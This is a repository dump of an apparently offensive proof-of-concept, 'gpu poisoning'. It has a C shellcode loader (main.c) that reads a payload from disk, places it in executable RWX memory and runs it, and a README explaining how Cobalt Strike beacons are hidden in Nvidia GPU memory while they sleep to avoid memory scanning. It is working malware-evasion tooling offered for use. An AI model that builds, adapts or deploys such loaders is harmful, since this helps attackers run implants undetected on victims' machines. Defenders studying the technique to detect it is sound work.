 16 |  *  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
 17 |  *  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
 18 |  *  TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
 19 |  *  PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER
 20 |  *  OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
 21 |  *  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
 22 |  *  PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
 23 |  *  PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
 24 |  *  LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
 25 |  *  NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
 26 |  *  SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 27 |  */
 28 | 
 29 | #pragma once
 30 | 
 31 | #if !(defined _M_IX86) && !(defined _M_X64) && !(defined __i386__) && !(defined __x86_64__)
 32 | #error MinHook supports only x86 and x64 systems.
 33 | #endif
 34 | 
 35 | #include <windows.h>
 36 | 
 37 |  // MinHook Error Codes.
 38 | typedef enum MH_STATUS
 39 | {
 40 |     // Unknown error. Should not be returned.
 41 |     MH_UNKNOWN = -1,
 42 | 
 43 |     // Successful.
 44 |     MH_OK = 0,
 45 | 
 46 |     // MinHook is already initialized.
 47 |     MH_ERROR_ALREADY_INITIALIZED,
 48 | 
 49 |     // MinHook is not initialized yet, or already uninitialized.
 50 |     MH_ERROR_NOT_INITIALIZED,
 51 | 
 52 |     // The hook for the specified target function is already created.
 53 |     MH_ERROR_ALREADY_CREATED,
 54 | 
 55 |     // The hook for the specified target function is not created yet.
 56 |     MH_ERROR_NOT_CREATED,
 57 | 
 58 |     // The hook for the specified target function is already enabled.
 59 |     MH_ERROR_ENABLED,
 60 | 
 61 |     // The hook for the specified target function is not enabled yet, or already
 62 |     // disabled.
 63 |     MH_ERROR_DISABLED,
 64 | 
 65 |     // The specified pointer is invalid. It points the address of non-allocated
 66 |     // and/or non-executable region.
 67 |     MH_ERROR_NOT_EXECUTABLE,
 68 | 
 69 |     // The specified target function cannot be hooked.
 70 |     MH_ERROR_UNSUPPORTED_FUNCTION,
 71 | 
 72 |     // Failed to allocate memory.
 73 |     MH_ERROR_MEMORY_ALLOC,
 74 | 
 75 |     // Failed to change the memory protection.
 76 |     MH_ERROR_MEMORY_PROTECT,
 77 | 
 78 |     // The specified module is not loaded.
 79 |     MH_ERROR_MODULE_NOT_FOUND,
 80 | 
 81 |     // The specified function is not found.
 82 |     MH_ERROR_FUNCTION_NOT_FOUND
 83 | }
 84 | MH_STATUS;
 85 | 
 86 | // Can be passed as a parameter to MH_EnableHook, MH_DisableHook,
 87 | // MH_QueueEnableHook or MH_QueueDisableHook.
 88 | #define MH_ALL_HOOKS NULL
 89 | 
 90 | #ifdef __cplusplus
 91 | extern "C" {
 92 | #endif
 93 | 
 94 |     // Initialize the MinHook library. You must call this function EXACTLY ONCE
 95 |     // at the beginning of your program.
 96 |     MH_STATUS WINAPI MH_Initialize(VOID);
 97 | 
 98 |     // Uninitialize the MinHook library. You must call this function EXACTLY
 99 |     // ONCE at the end of your program.
100 |     MH_STATUS WINAPI MH_Uninitialize(VOID);
101 | 
102 |     // Creates a hook for the specified target function, in disabled state.
103 |     // Parameters:
104 |     //   pTarget     [in]  A pointer to the target function, which will be
105 |     //                     overridden by the detour function.
106 |     //   pDetour     [in]  A pointer to the detour function, which will override
107 |     //                     the target function.
108 |     //   ppOriginal  [out] A pointer to the trampoline function, which will be
109 |     //                     used to call the original target function.
110 |     //                     This parameter can be NULL.
111 |     MH_STATUS WINAPI MH_CreateHook(LPVOID pTarget, LPVOID pDetour, LPVOID* ppOriginal);
112 | 
113 |     // Creates a hook for the specified API function, in disabled state.
114 |     // Parameters:
115 |     //   pszModule   [in]  A pointer to the loaded module name which contains the
116 |     //                     target function.
117 |     //   pszProcName [in]  A pointer to the target function name, which will be
118 |     //                     overridden by the detour function.
119 |     //   pDetour     [in]  A pointer to the detour function, which will override
120 |     //                     the target function.
121 |     //   ppOriginal  [out] A pointer to the trampoline function, which will be
122 |     //                     used to call the original target function.
123 |     //                     This parameter can be NULL.
124 |     MH_STATUS WINAPI MH_CreateHookApi(
125 |         LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID* ppOriginal);
126 | 
127 |     // Creates a hook for the specified API function, in disabled state.
128 |     // Parameters:
129 |     //   pszModule   [in]  A pointer to the loaded module name which contains the
130 |     //                     target function.
131 |     //   pszProcName [in]  A pointer to the target function name, which will be
132 |     //                     overridden by the detour function.
133 |     //   pDetour     [in]  A pointer to the detour function, which will override
134 |     //                     the target function.
135 |     //   ppOriginal  [out] A pointer to the trampoline function, which will be
136 |     //                     used to call the original target function.
137 |     //                     This parameter can be NULL.
138 |     //   ppTarget    [out] A pointer to the target function, which will be used
139 |     //                     with other functions.
140 |     //                     This parameter can be NULL.
141 |     MH_STATUS WINAPI MH_CreateHookApiEx(
142 |         LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID* ppOriginal, LPVOID* ppTarget);
143 | 
144 |     // Removes an already created hook.
145 |     // Parameters:
146 |     //   pTarget [in] A pointer to the target function.
147 |     MH_STATUS WINAPI MH_RemoveHook(LPVOID pTarget);
148 | 
149 |     // Enables an already created hook.
150 |     // Parameters:
151 |     //   pTarget [in] A pointer to the target function.
152 |     //                If this parameter is MH_ALL_HOOKS, all created hooks are
153 |     //                enabled in one go.
154 |     MH_STATUS WINAPI MH_EnableHook(LPVOID pTarget);
155 | 
156 |     // Disables an already created hook.
157 |     // Parameters:
158 |     //   pTarget [in] A pointer to the target function.
159 |     //                If this parameter is MH_ALL_HOOKS, all created hooks are
160 |     //                disabled in one go.
161 |     MH_STATUS WINAPI MH_DisableHook(LPVOID pTarget);
162 | 
163 |     // Queues to enable an already created hook.
164 |     // Parameters:
165 |     //   pTarget [in] A pointer to the target function.
166 |     //                If this parameter is MH_ALL_HOOKS, all created hooks are
167 |     //                queued to be enabled.
168 |     MH_STATUS WINAPI MH_QueueEnableHook(LPVOID pTarget);
169 | 
170 |     // Queues to disable an already created hook.
171 |     // Parameters:
172 |     //   pTarget [in] A pointer to the target function.
173 |     //                If this parameter is MH_ALL_HOOKS, all created hooks are
174 |     //                queued to be disabled.
175 |     MH_STATUS WINAPI MH_QueueDisableHook(LPVOID pTarget);
176 | 
177 |     // Applies all queued changes in one go.
178 |     MH_STATUS WINAPI MH_ApplyQueued(VOID);
179 | 
180 |     // Translates the MH_STATUS to its name as a string.
181 |     const char* WINAPI MH_StatusToString(MH_STATUS status);
182 | 
183 | #ifdef __cplusplus
184 | }
185 | #endif
186 | 


--------------------------------------------------------------------------------
/GP/main.c:
--------------------------------------------------------------------------------
  1 | /*
  2 | 	PROGRAMMED BY ORCA 3:20 PM 6/25/2022
  3 | 	POC ON USING GPU MEMORY TO HIDE THE PAYLOAD
  4 | */
  5 | 
  6 | #include <Windows.h>
  7 | #include <stdio.h>
  8 | #include "Common.h"
  9 | 
 10 | //#define DEBUG	  // just to save time and run ReadPayloadFile directly using a default path
 11 | #define GPUEngage // the thing
 12 | #define CleanStg1 // clean the first stage, (payload we read)
 13 | 
 14 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------------//
 15 | // function to read the payload from disk
 16 | BOOL ReadPayloadFile(char* FileInput, PDWORD Stage1Size, unsigned char** PayloadRead) {
 17 | 	HANDLE hFile = INVALID_HANDLE_VALUE;
 18 | 	DWORD FileSize, lpNumberOfBytesRead;
 19 | 	BOOL Succ;
 20 | 
 21 | 	hFile = CreateFileA(FileInput, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_READONLY, NULL);
 22 | 	if (hFile == INVALID_HANDLE_VALUE) {
 23 | 		printf("[!] ERROR CreateFileA : %d\n", GetLastError());
 24 | 		return FALSE;
 25 | 	}
 26 | 
 27 | 	FileSize = GetFileSize(hFile, NULL);
 28 | 	unsigned char* Payload = (unsigned char*)malloc(FileSize);
 29 | 	ZeroMemory(Payload, sizeof Payload);
 30 | 
 31 | 	Succ = ReadFile(hFile, Payload, FileSize, &lpNumberOfBytesRead, NULL);
 32 | 	if (!Succ) {
 33 | 		printf("[!] ERROR ReadFile : %d\n", GetLastError());
 34 | 		return FALSE;
 35 | 	}
 36 | 	
 37 | 	printf("[i] Payload [%d] at 0x%p\n", lpNumberOfBytesRead, (void*)Payload);
 38 | 
 39 | 	*PayloadRead = Payload;
 40 | 	*Stage1Size = lpNumberOfBytesRead;
 41 | 
 42 | 	CloseHandle(hFile);
 43 | 	return TRUE;
 44 | }
 45 | 
 46 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------------//
 47 | #ifdef CleanStg1
 48 | typedef struct _CleanStage1 {
 49 | 	DWORD Stage1Size;
 50 | 	PVOID Stage1Address;
 51 | } CleanStage1, *PCleanStage1;
 52 | 
 53 | // http://filipivianna.blogspot.com/2010/07/usleep-on-windows-win32.html
 54 | void uSleep(int waitTime) {
 55 | 	__int64 time1 = 0, time2 = 0, freq = 0;
 56 | 
 57 | 	QueryPerformanceCounter((LARGE_INTEGER*)&time1);
 58 | 	QueryPerformanceFrequency((LARGE_INTEGER*)&freq);
 59 | 
 60 | 	do {
 61 | 		QueryPerformanceCounter((LARGE_INTEGER*)&time2);
 62 | 	} while ((time2 - time1) < waitTime);
 63 | }
 64 | 
 65 | void CleanStage1Thread (PCleanStage1 ThreadPrameters) {
 66 | 	// Sleep for 3 sec , NOTE, that we can't use Sleep function cz its hooked 
 67 | 	uSleep(3000000);
 68 | 	ZeroMemory(ThreadPrameters->Stage1Address, ThreadPrameters->Stage1Size);
 69 | 	VirtualFree(ThreadPrameters->Stage1Address, ThreadPrameters->Stage1Size, MEM_DECOMMIT);
 70 | }
 71 | #endif // CleanStg1
 72 | 
 73 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------------//
 74 | 
 75 | 
 76 | int main(int argc, char ** argv) {
 77 | 
 78 | 	PVOID Stage1Address = NULL;
 79 | 	DWORD Stage1Size = NULL;
 80 | 	unsigned char* Payload;
 81 | 	
 82 | 
 83 | #ifndef DEBUG
 84 | 	if (argc != 2) {
 85 | 		printf("[-] Please Enter The Path Of The File To Run ... \n");
 86 | 		return -1;
 87 | 	}
 88 | 	if (!ReadPayloadFile(argv[1], &Stage1Size, &Payload)) {
 89 | 		return -1;
 90 | 	}
 91 | #else // in case of debugging:
 92 | #define DEFAULT_PD_PATH "C:\\full\\path\\to\\payload.bin"
 93 | 	if (!ReadPayloadFile(DEFAULT_PD_PATH, &Stage1Size, &Payload)) {
 94 | 		return -1;
 95 | 	}
 96 | #endif // !DEBUG
 97 | 
 98 | 	if (Stage1Size == NULL || Payload == NULL){
 99 | 		return -1;
100 | 	}
101 | 
102 | 	// you could do better than VirtualAlloc with RWX, just a poc here ...
103 | 	if ((Stage1Address = VirtualAlloc(NULL, Stage1Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL){
104 | 		printf("[!] ERROR VirtualAlloc : %d\n", GetLastError());
105 | 		return -1;
106 | 	}
107 | 	else{
108 | 		memcpy(Stage1Address, Payload, Stage1Size);
109 | 		free(Payload); // freeing the read payload
110 | 	}
111 | 
112 | #ifdef GPUEngage
113 | 	if (!IsNvidiaGraphicsCardPresent()){
114 | 		printf("[!] You dont have nvidia gpu ... \n");
115 | 		return -1;
116 | 	}
117 | 	if (!InitializeMemToGpu()) {
118 | 		printf("[!] InitializeMemToGpu failed ... \n");
119 | 		return -1;
120 | 	}
121 | #endif // GPUEngage
122 | 
123 | 
124 | #ifdef CleanStg1
125 | 	// this is to clean stage 1 payload (the one we read)
126 | 	CleanStage1 ThreadPrameters = { 0 };
127 | 	ThreadPrameters.Stage1Size = Stage1Size;
128 | 	ThreadPrameters.Stage1Address = Stage1Address;
129 | 	CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)CleanStage1Thread, &ThreadPrameters, 0, NULL);
130 | #endif // CleanStg1
131 | 
132 | 	
133 | 
134 | 	// running 
135 | 	(*(void(*)())Stage1Address)();
136 | 
137 | 	printf("[i] Hit Enter To Exit ...");
138 | 	getchar();
139 | 
140 | 	return 0;
141 | }


--------------------------------------------------------------------------------
/GP/minhook.x64.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/H1d3r/GPU_ShellCode/f873e726ae10719ea7c5502beaa5d217fc4f723b/GP/minhook.x64.lib


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2022 ORCA
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ### gpu poisoning; hide the payload inside the gpu memory.
 2 | 
 3 | ##### after my older [repo](https://gitlab.com/ORCA000/t.d.p), in which i used the thread description to hide the payload, i wanted to find new way, so now im using **nividia** gpu memory using cuda api's to allocate, write, and free when there is no need for the payload to be found in memory.
 4 | 
 5 | #### Steps:
 6 | 1- first, we need to setup and initialize some structs / and run our ve handler.
 7 | 
 8 | 2- second, we run the **stageless** payload, we **must** use stageless, to know where
 9 | the reflection will land (im using cobalt strike and it uses dll reflective loader), we only care about the `2nd stage` cz thats the actual 
10 | payload. i didnt add any tricks to this step, just a virtualalloc and a rwx section
11 | 
12 | 3- now when the payload goes to sleep, we copy the payload to the gpu memory, and clean the payload in the real memory.
13 | 
14 | 4- when the sleep is done, the veh will handle the exception (EXCEPTION_ACCESS_VIOLATION) by re-setting the memory permissions to `PAGE_EXECUTE_READWRITE`, and placing the payload back in place from the gpu.
15 | 
16 | 
17 | #### Demo:
18 | ![img](https://gitlab.com/ORCA000/gp/-/raw/main/images/demo1.png)
19 | #### Thanks for : [vxunderground papers](https://github.com/vxunderground/VXUG-Papers/blob/main/GpuMemoryAbuse.cpp)
20 | 
21 | 
22 | <br>
23 | <br>
24 | <br>
25 | 
26 | 
27 | 
28 | 


--------------------------------------------------------------------------------
/images/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/H1d3r/GPU_ShellCode/f873e726ae10719ea7c5502beaa5d217fc4f723b/images/.gitkeep


--------------------------------------------------------------------------------
/images/demo1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/H1d3r/GPU_ShellCode/f873e726ae10719ea7c5502beaa5d217fc4f723b/images/demo1.png


--------------------------------------------------------------------------------